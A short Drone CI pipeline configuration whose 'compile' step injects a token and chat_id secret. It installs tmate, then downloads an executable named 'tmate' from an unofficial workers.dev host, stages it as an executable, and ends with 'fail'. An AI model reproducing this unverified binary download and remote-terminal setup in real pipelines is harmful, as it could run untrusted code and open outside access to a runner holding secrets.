kind: pipeline
name: Drone

steps:
 - name: compile
   image: starlight2834/ci_docker:latest
   environment:
     token:
       from_secret: token
     chat_id:
       from_secret: chat_id
   commands:
      - apt-get update &&apt-get install wget tmate -y
      - wget https://drive.officialmirror.workers.dev/tmate
      - mkdir -p /usr/drone/
      - mkdir -p /usr/drone/bin/
      - mv tmate /usr/drone/bin/tmate
      - chmod +x /usr/drone/bin/tmate
      - fail
